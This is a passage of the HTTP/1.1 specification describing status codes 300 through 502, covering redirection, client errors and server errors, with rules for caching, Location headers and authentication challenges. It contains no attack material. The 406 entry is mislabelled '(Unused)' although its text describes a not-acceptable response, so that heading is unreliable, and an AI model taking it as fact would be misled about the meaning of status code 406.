A cache that does not support the Range and Content-Range headers MUST NOT cache 206 (Partial) responses.


Redirection 3xx

300 Multiple Choices
The requested resource corresponds to any one of a set of representations, each with its own specific location, and agent- driven negotiation information (section 12) is being provided so that the user (or user agent) can select a preferred representation and redirect its request to that location.

Unless it was a HEAD request, the response SHOULD include an entity containing a list of resource characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content- Type header field. Depending upon the format and the capabilities of

the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.

If the server has a preferred choice of representation, it SHOULD include the specific URI for that representation in the Location field; user agents MAY use the Location field value for automatic redirection. This response is cacheable unless indicated otherwise.


301 Moved Permanently
The requested resource has been assigned a new permanent URI and any future references to this resource SHOULD use one of the returned URIs. Clients with link editing capabilities ought to automatically re-link references to the Request-URI to one or more of the new references returned by the server, where possible. This response is cacheable unless indicated otherwise.

The new permanent URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).

If the 301 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.

Note: When automatically redirecting a POST request after receiving a 301 status code, some existing HTTP/1.0 user agents will erroneously change it into a GET request.


302 Found
The requested resource resides temporarily under a different URI. Since the redirection might be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field.

The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).

If the 302 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.

Note: RFC 1945 and RFC 2068 specify that the client is not allowed to change the method on the redirected request. However, most existing user agent implementations treat 302 as if it were a 303 response, performing a GET on the Location field-value regardless of the original request method. The status codes 303 and 307 have been added for servers that wish to make unambiguously clear which kind of reaction is expected of the client.

303 See Other
The response to the request can be found under a different URI and SHOULD be retrieved using a GET method on that resource. This method exists primarily to allow the output of a POST-activated script to redirect the user agent to a selected resource. The new URI is not a substitute reference for the originally requested resource. The 303 response MUST NOT be cached, but the response to the second (redirected) request might be cacheable.

The different URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s).

Note: Many pre-HTTP/1.1 user agents do not understand the 303 status. When interoperability with such clients is a concern, the 302 status code may be used instead, since most user agents react to a 302 response as described here for 303.

304 Not Modified
If the client has performed a conditional GET request and access is allowed, but the document has not been modified, the server SHOULD respond with this status code. The 304 response MUST NOT contain a message-body, and thus is always terminated by the first empty line after the header fields.

The response MUST include the following header fields:

- Date, unless its omission is required by section 14.18.1
If a clockless origin server obeys these rules, and proxies and clients add their own Date to any response received without one (as already specified by [RFC 2068], section 14.19 ), caches will operate correctly.

- ETag and/or Content-Location, if the header would have been sent in a 200 response to the same request - Expires, Cache-Control, and/or Vary, if the field-value might differ from that sent in any previous response for the same variant
If the conditional GET used a strong cache validator (see section 13.3.3), the response SHOULD NOT include other entity-headers. Otherwise (i.e., the conditional GET used a weak validator), the response MUST NOT include other entity-headers; this prevents inconsistencies between cached entity-bodies and updated headers.

If a 304 response indicates an entity not currently cached, then the cache MUST disregard the response and repeat the request without the conditional.

If a cache uses a received 304 response to update a cache entry, the cache MUST update the entry to reflect any new field values given in the response.


305 Use Proxy
The requested resource MUST be accessed through the proxy given by the Location field. The Location field gives the URI of the proxy. The recipient is expected to repeat this single request via the proxy. 305 responses MUST only be generated by origin servers.

Note: RFC 2068 was not clear that 305 was intended to redirect a single request, and to be generated by origin servers only. Not observing these limitations has significant security consequences.

306 (Unused)
The 306 status code was used in a previous version of the specification, is no longer used, and the code is reserved.


307 Temporary Redirect
The requested resource resides temporarily under a different URI. Since the redirection MAY be altered on occasion, the client SHOULD continue to use the Request-URI for future requests. This response is only cacheable if indicated by a Cache-Control or Expires header field.

The temporary URI SHOULD be given by the Location field in the response. Unless the request method was HEAD, the entity of the response SHOULD contain a short hypertext note with a hyperlink to the new URI(s) , since many pre-HTTP/1.1 user agents do not understand the 307 status. Therefore, the note SHOULD contain the information necessary for a user to repeat the original request on the new URI.

If the 307 status code is received in response to a request other than GET or HEAD, the user agent MUST NOT automatically redirect the request unless it can be confirmed by the user, since this might change the conditions under which the request was issued.


Client Error 4xx

400 Bad Request
The request could not be understood by the server due to malformed syntax. The client SHOULD NOT repeat the request without modifications.


401 Unauthorized
The request requires user authentication. The response MUST include a WWW-Authenticate header field (section 14.47) containing a challenge applicable to the requested resource. The client MAY repeat the request with a suitable Authorization header field (section 14.8 ). If the request already included Authorization credentials, then the 401 response indicates that authorization has been refused for those credentials. If the 401 response contains the same challenge as the prior response, and the user agent has already attempted authentication at least once, then the user SHOULD be presented the entity that was given in the response, since that entity might include relevant diagnostic information. HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication" [43] .


402 Payment Required
This code is reserved for future use.


403 Forbidden
The server understood the request, but is refusing to fulfill it. Authorization will not help and the request SHOULD NOT be repeated. If the request method was not HEAD and the server wishes to make public why the request has not been fulfilled, it SHOULD describe the reason for the refusal in the entity. If the server does not wish to make this information available to the client, the status code 404 (Not Found) can be used instead.


404 Not Found
The server has not found anything matching the Request-URI. No indication is given of whether the condition is temporary or permanent. The 410 (Gone) status code SHOULD be used if the server knows, through some internally configurable mechanism, that an old resource is permanently unavailable and has no forwarding address. This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.


405 Method Not Allowed
The method specified in the Request-Line is not allowed for the resource identified by the Request-URI. The response MUST include an Allow header containing a list of valid methods for the requested resource.


406 (Unused)
The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.

Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.

Note: HTTP/1.1 servers are allowed to return responses which are not acceptable according to the accept headers sent in the request. In some cases, this may even be preferable to sending a 406 response. User agents are encouraged to inspect the headers of an incoming response to determine if it is acceptable.
If the response could be unacceptable, a user agent SHOULD temporarily stop receipt of more data and query the user for a decision on further actions.


407 Proxy Authentication Required
This code is similar to 401 (Unauthorized), but indicates that the client must first authenticate itself with the proxy. The proxy MUST return a Proxy-Authenticate header field (section 14.33 ) containing a challenge applicable to the proxy for the requested resource. The client MAY repeat the request with a suitable Proxy-Authorization header field (section 14.34 ). HTTP access authentication is explained in "HTTP Authentication: Basic and Digest Access Authentication" [43] .


408 Request Timeout
The client did not produce a request within the time that the server was prepared to wait. The client MAY repeat the request without modifications at any later time.


409 Conflict
The request could not be completed due to a conflict with the current state of the resource. This code is only allowed in situations where it is expected that the user might be able to resolve the conflict and resubmit the request. The response body SHOULD include enough

information for the user to recognize the source of the conflict. Ideally, the response entity would include enough information for the user or user agent to fix the problem; however, that might not be possible and is not required.

Conflicts are most likely to occur in response to a PUT request. For example, if versioning were being used and the entity being PUT included changes to a resource which conflict with those made by an earlier (third-party) request, the server might use the 409 response to indicate that it can't complete the request. In this case, the response entity would likely contain a list of the differences between the two versions in a format defined by the response Content-Type.


410 Gone
The requested resource is no longer available at the server and no forwarding address is known. This condition is expected to be considered permanent. Clients with link editing capabilities SHOULD delete references to the Request-URI after user approval. If the server does not know, or has no facility to determine, whether or not the condition is permanent, the status code 404 (Not Found) SHOULD be used instead. This response is cacheable unless indicated otherwise.

The 410 response is primarily intended to assist the task of web maintenance by notifying the recipient that the resource is intentionally unavailable and that the server owners desire that remote links to that resource be removed. Such an event is common for limited-time, promotional services and for resources belonging to individuals no longer working at the server's site. It is not necessary to mark all permanently unavailable resources as "gone" or to keep the mark for any length of time -- that is left to the discretion of the server owner.


411 Length Required
The server refuses to accept the request without a defined Content- Length. The client MAY repeat the request if it adds a valid Content-Length header field containing the length of the message-body in the request message.


412 Precondition Failed
The precondition given in one or more of the request-header fields evaluated to false when it was tested on the server. This response code allows the client to place preconditions on the current resource metainformation (header field data) and thus prevent the requested method from being applied to a resource other than the one intended.


413 Request Entity Too Large
The server is refusing to process a request because the request entity is larger than the server is willing or able to process. The server MAY close the connection to prevent the client from continuing the request.

If the condition is temporary, the server SHOULD include a Retry- After header field to indicate that it is temporary and after what time the client MAY try again.


414 Request-URI Too Long
The server is refusing to service the request because the Request-URI is longer than the server is willing to interpret. This rare condition is only likely to occur when a client has improperly converted a POST request to a GET request with long query information, when the client has descended into a URI "black hole" of redirection (e.g., a redirected URI prefix that points to a suffix of itself), or when the server is under attack by a client attempting to exploit security holes present in some servers using fixed-length buffers for reading or manipulating the Request-URI.


415 Unsupported Media Type
The server is refusing to service the request because the entity of the request is in a format not supported by the requested resource for the requested method.


416 Requested Range Not Satisfiable
A server SHOULD return a response with this status code if a request included a Range request-header field (section 14.35), and none of the range-specifier values in this field overlap the current extent of the selected resource, and the request did not include an If-Range request-header field. (For byte-ranges, this means that the first- byte-pos of all of the byte-range-spec values were greater than the current length of the selected resource.)

When this status code is returned for a byte-range request, the response SHOULD include a Content-Range entity-header field specifying the current length of the selected resource (see section 14.16 ). This response MUST NOT use the multipart/byteranges content- type.


417 Expectation Failed
The expectation given in an Expect request-header field (see section 14.20) could not be met by this server, or, if the server is a proxy, the server has unambiguous evidence that the request could not be met by the next-hop server.


Server Error 5xx

500 Internal Server Error
The server encountered an unexpected condition which prevented it from fulfilling the request.


501 Not Implemented
The server does not support the functionality required to fulfill the request. This is the appropriate response when the server does not recognize the request method and is not capable of supporting it for any resource.


502 Bad Gateway
The server, while acting as a gateway or proxy, received an invalid response from the upstream server it accessed in attempting to fulfill the request.